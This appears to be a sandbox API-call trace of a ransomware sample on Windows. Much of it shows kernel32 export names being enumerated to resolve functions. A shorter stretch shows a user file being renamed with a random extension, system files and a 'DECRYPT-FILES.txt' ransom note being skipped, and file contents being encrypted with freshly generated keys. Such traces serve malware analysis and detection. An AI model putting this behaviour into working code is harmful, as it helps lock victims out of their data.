[0083.427] lstrlenA (lpString="DEVICEIOCONTROL") returned 15 [0083.427] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DisableThreadLibraryCalls" | out: lpString1="DisableThreadLibraryCalls") returned="DisableThreadLibraryCalls" [0083.427] lstrlenA (lpString="DISABLETHREADLIBRARYCALLS") returned 25 [0083.427] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DisableThreadProfiling" | out: lpString1="DisableThreadProfiling") returned="DisableThreadProfiling" [0083.427] lstrlenA (lpString="DISABLETHREADPROFILING") returned 22 [0083.427] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DisassociateCurrentThreadFromCallback" | out: lpString1="DisassociateCurrentThreadFromCallback") returned="DisassociateCurrentThreadFromCallback" [0083.427] lstrlenA (lpString="DISASSOCIATECURRENTTHREADFROMCALLBACK") returned 37 [0083.427] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DisconnectNamedPipe" | out: lpString1="DisconnectNamedPipe") returned="DisconnectNamedPipe" [0083.427] lstrlenA (lpString="DISCONNECTNAMEDPIPE") returned 19 [0083.427] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DnsHostnameToComputerNameA" | out: lpString1="DnsHostnameToComputerNameA") returned="DnsHostnameToComputerNameA" [0083.427] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEA") returned 26 [0083.427] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DnsHostnameToComputerNameW" | out: lpString1="DnsHostnameToComputerNameW") returned="DnsHostnameToComputerNameW" [0083.427] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEW") returned 26 [0083.427] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DosDateTimeToFileTime" | out: lpString1="DosDateTimeToFileTime") returned="DosDateTimeToFileTime" [0083.427] lstrlenA (lpString="DOSDATETIMETOFILETIME") returned 21 [0083.427] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DosPathToSessionPathA" | out: lpString1="DosPathToSessionPathA") returned="DosPathToSessionPathA" [0083.427] lstrlenA (lpString="DOSPATHTOSESSIONPATHA") returned 21 [0083.427] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DosPathToSessionPathW" | out: lpString1="DosPathToSessionPathW") returned="DosPathToSessionPathW" [0083.427] lstrlenA (lpString="DOSPATHTOSESSIONPATHW") returned 21 [0083.427] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DuplicateConsoleHandle" | out: lpString1="DuplicateConsoleHandle") returned="DuplicateConsoleHandle" [0083.428] lstrlenA (lpString="DUPLICATECONSOLEHANDLE") returned 22 [0083.428] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DuplicateHandle" | out: lpString1="DuplicateHandle") returned="DuplicateHandle" [0083.428] lstrlenA (lpString="DUPLICATEHANDLE") returned 15 [0083.428] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnableThreadProfiling" | out: lpString1="EnableThreadProfiling") returned="EnableThreadProfiling" [0083.428] lstrlenA (lpString="ENABLETHREADPROFILING") returned 21 [0083.428] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EncodePointer" | out: lpString1="EncodePointer") returned="EncodePointer" [0083.428] lstrlenA (lpString="ENCODEPOINTER") returned 13 [0083.428] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EncodeSystemPointer" | out: lpString1="EncodeSystemPointer") returned="EncodeSystemPointer" [0083.428] lstrlenA (lpString="ENCODESYSTEMPOINTER") returned 19 [0083.428] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EndUpdateResourceA" | out: lpString1="EndUpdateResourceA") returned="EndUpdateResourceA" [0083.428] lstrlenA (lpString="ENDUPDATERESOURCEA") returned 18 [0083.428] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EndUpdateResourceW" | out: lpString1="EndUpdateResourceW") returned="EndUpdateResourceW" [0083.428] lstrlenA (lpString="ENDUPDATERESOURCEW") returned 18 [0083.428] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnterCriticalSection" | out: lpString1="EnterCriticalSection") returned="EnterCriticalSection" [0083.428] lstrlenA (lpString="ENTERCRITICALSECTION") returned 20 [0083.428] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumCalendarInfoA" | out: lpString1="EnumCalendarInfoA") returned="EnumCalendarInfoA" [0083.428] lstrlenA (lpString="ENUMCALENDARINFOA") returned 17 [0083.428] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumCalendarInfoExA" | out: lpString1="EnumCalendarInfoExA") returned="EnumCalendarInfoExA" [0083.428] lstrlenA (lpString="ENUMCALENDARINFOEXA") returned 19 [0083.428] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumCalendarInfoExEx" | out: lpString1="EnumCalendarInfoExEx") returned="EnumCalendarInfoExEx" [0083.428] lstrlenA (lpString="ENUMCALENDARINFOEXEX") returned 20 [0083.428] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumCalendarInfoExW" | out: lpString1="EnumCalendarInfoExW") returned="EnumCalendarInfoExW" [0083.428] lstrlenA (lpString="ENUMCALENDARINFOEXW") returned 19 [0083.428] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumCalendarInfoW" | out: lpString1="EnumCalendarInfoW") returned="EnumCalendarInfoW" [0083.428] lstrlenA (lpString="ENUMCALENDARINFOW") returned 17 [0083.428] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumDateFormatsA" | out: lpString1="EnumDateFormatsA") returned="EnumDateFormatsA" [0083.428] lstrlenA (lpString="ENUMDATEFORMATSA") returned 16 [0083.428] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumDateFormatsExA" | out: lpString1="EnumDateFormatsExA") returned="EnumDateFormatsExA" [0083.428] lstrlenA (lpString="ENUMDATEFORMATSEXA") returned 18 [0083.428] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumDateFormatsExEx" | out: lpString1="EnumDateFormatsExEx") returned="EnumDateFormatsExEx" [0083.428] lstrlenA (lpString="ENUMDATEFORMATSEXEX") returned 19 [0083.428] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumDateFormatsExW" | out: lpString1="EnumDateFormatsExW") returned="EnumDateFormatsExW" [0083.428] lstrlenA (lpString="ENUMDATEFORMATSEXW") returned 18 [0083.428] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumDateFormatsW" | out: lpString1="EnumDateFormatsW") returned="EnumDateFormatsW" [0083.429] lstrcpyW (in: lpString1=0x10d0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0083.429] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\J_aqHGSKk0khojmC4hut.m4a") returned 62 [0083.429] wsprintfW (in: param_1=0x3f2e120, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\J_aqHGSKk0khojmC4hut.m4a.gHrC7") returned 68 [0083.429] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\J_aqHGSKk0khojmC4hut.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\j_aqhgskk0khojmc4hut.m4a"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\J_aqHGSKk0khojmC4hut.m4a.gHrC7" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\j_aqhgskk0khojmc4hut.m4a.ghrc7"), dwFlags=0x0) returned 1 [0083.430] VirtualFree (lpAddress=0xfc0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.430] VirtualFree (lpAddress=0x10d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.430] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.430] FindNextFileW (in: hFindFile=0x5f8b98, lpFindFileData=0x3f2f150 | out: lpFindFileData=0x3f2f150*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x274c2910, ftCreationTime.dwHighDateTime=0x1d4d2a0, ftLastAccessTime.dwLowDateTime=0x537b8710, ftLastAccessTime.dwHighDateTime=0x1d4ca17, ftLastWriteTime.dwLowDateTime=0x537b8710, ftLastWriteTime.dwHighDateTime=0x1d4ca17, nFileSizeHigh=0x0, nFileSizeLow=0x1271c, dwReserved0=0x0, dwReserved1=0x0, cFileName="lABSAK16Bz2byuU.pps", cAlternateFileName="LABSAK~1.PPS")) returned 1 [0083.430] lstrcmpiW (lpString1="lABSAK16Bz2byuU.pps", lpString2="DECRYPT-FILES.txt") returned 1 [0083.430] lstrcmpiW (lpString1="lABSAK16Bz2byuU.pps", lpString2="autorun.inf") returned 1 [0083.431] lstrcmpiW (lpString1="lABSAK16Bz2byuU.pps", lpString2="boot.ini") returned 1 [0083.431] lstrcmpiW (lpString1="lABSAK16Bz2byuU.pps", lpString2="desktop.ini") returned 1 [0083.431] lstrcmpiW (lpString1="lABSAK16Bz2byuU.pps", lpString2="ntuser.dat") returned -1 [0083.431] lstrcmpiW (lpString1="lABSAK16Bz2byuU.pps", lpString2="iconcache.db") returned 1 [0083.431] lstrcmpiW (lpString1="lABSAK16Bz2byuU.pps", lpString2="bootsect.bak") returned 1 [0083.431] lstrcmpiW (lpString1="lABSAK16Bz2byuU.pps", lpString2="ntuser.dat.log") returned -1 [0083.431] lstrcmpiW (lpString1="lABSAK16Bz2byuU.pps", lpString2="thumbs.db") returned -1 [0083.431] lstrcmpiW (lpString1="lABSAK16Bz2byuU.pps", lpString2="Bootfont.bin") returned 1 [0083.431] lstrlenW (lpString="lABSAK16Bz2byuU.pps") returned 19 [0083.431] lstrcmpiW (lpString1="pps", lpString2="lnk") returned 1 [0083.431] lstrcmpiW (lpString1="pps", lpString2="exe") returned 1 [0083.431] lstrcmpiW (lpString1="pps", lpString2="sys") returned -1 [0083.431] lstrcmpiW (lpString1="pps", lpString2="dll") returned 1 [0083.431] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\") returned 38 [0083.431] lstrlenW (lpString="lABSAK16Bz2byuU.pps") returned 19 [0083.431] lstrcpyW (in: lpString1=0x3f2e920, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" [0083.431] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\", lpString2="lABSAK16Bz2byuU.pps" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\lABSAK16Bz2byuU.pps") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\lABSAK16Bz2byuU.pps" [0083.431] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0083.431] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\lABSAK16Bz2byuU.pps" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\labsak16bz2byuu.pps"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x438 [0083.431] GetFileSizeEx (in: hFile=0x438, lpFileSize=0x3f2e0e8 | out: lpFileSize=0x3f2e0e8*=75548) returned 1 [0083.431] CreateFileMappingW (hFile=0x438, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x43c [0083.432] MapViewOfFile (hFileMappingObject=0x43c, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x10d0000 [0083.432] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x20, pbBuffer=0xfb0000 | out: pbBuffer=0xfb0000) returned 1 [0083.432] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x8, pbBuffer=0xfb0020 | out: pbBuffer=0xfb0020) returned 1 [0083.432] VirtualAlloc (lpAddress=0x0, dwSize=0x108, flAllocationType=0x3000, flProtect=0x4) returned 0xfc0000 [0083.432] CryptEncrypt (in: hKey=0x5f8a98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfc0000*, pdwDataLen=0x3f2e050*=0x28, dwBufLen=0x100 | out: pbData=0xfc0000*, pdwDataLen=0x3f2e050*=0x100) returned 1 [0083.432] VirtualAlloc (lpAddress=0x0, dwSize=0x1001, flAllocationType=0x3000, flProtect=0x4) returned 0x10f0000 [0083.434] VirtualFree (lpAddress=0x10f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.434] UnmapViewOfFile (lpBaseAddress=0x10d0000) returned 1 [0083.435] CloseHandle (hObject=0x43c) returned 1 [0083.435] SetFilePointerEx (in: hFile=0x438, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0083.435] WriteFile (in: hFile=0x438, lpBuffer=0xfc0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x3f2e070, lpOverlapped=0x0 | out: lpBuffer=0xfc0000*, lpNumberOfBytesWritten=0x3f2e070*=0x108, lpOverlapped=0x0) returned 1 [0083.436] CloseHandle (hObject=0x0) returned 0 [0083.436] CloseHandle (hObject=0x438) returned 1 [0083.436] VirtualFree (lpAddress=0xfc0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.436] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.436] GetTickCount () returned 0x114d53a [0083.436] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0083.437] lstrlenW (lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 62 [0083.437] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0xfc0000 [0083.437] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x3000, flProtect=0x4) returned 0x10d0000 [0083.437] lstrlenA (lpString="kernel32.dll") returned 12 [0083.437] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76c20000 [0083.437] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0083.438] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0083.438] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0083.438] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0083.438] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0083.438] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0083.438] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0083.438] lstrlenA (lpString="ADDATOMA") returned 8 [0083.438] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0083.438] lstrlenA (lpString="ADDATOMW") returned 8 [0083.438] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0083.438] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0083.438] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0083.438] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0083.438] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0083.438] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0083.438] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0083.438] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0083.438] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0083.438] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0083.438] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0083.438] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0083.438] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0083.438] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0083.438] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0083.438] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0083.438] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0083.438] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0083.438] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0083.438] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0083.438] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0083.438] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0083.438] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0083.438] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0083.438] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0083.438] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0083.438] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0083.438] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0083.439] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0083.439] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0083.439] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0083.439] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0083.439] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0083.439] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0083.439] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0083.439] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0083.439] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0083.439] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0083.439] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0083.439] lstrlenA (lpString="BACKUPREAD") returned 10 [0083.439] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0083.439] lstrlenA (lpString="BACKUPSEEK") returned 10 [0083.439] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0083.439] lstrlenA (lpString="BACKUPWRITE") returned 11 [0083.439] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0083.439] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0083.439] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0083.439] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0083.439] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0083.439] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0083.439] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0083.439] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0083.439] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0083.439] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0083.439] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0083.439] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0083.439] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0083.439] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0083.439] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0083.439] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0083.439] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0083.439] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0083.439] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0083.439] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0083.439] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0083.440] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0083.440] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0083.440] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0083.440] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0083.440] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0083.440] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0083.440] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0083.440] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0083.440] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0083.440] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0083.440] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0083.440] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0083.440] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0083.440] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0083.440] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0083.440] lstrcpyA (in: lpString1=0x3f2d468, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0083.440] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0083.440] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0083.440] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0083.440] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0083.440] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0083.440] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0083.440] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0083.440] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0083.440] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0083.440] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0083.440] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0083.440] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0083.440] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0083.440] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0083.440] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0083.440] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0083.440] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0083.440] lstrcpyA (in: lpString1=0x3f2d468, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0083.440] lstrlenA (lpString="BEEP") returned 4 [0083.441] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0083.441] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0083.441] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0083.441] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0083.441] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0083.441] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0083.441] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0083.441] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0083.441] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0083.441] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0083.441] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BuildCommDCBAndTimeoutsW" | out: 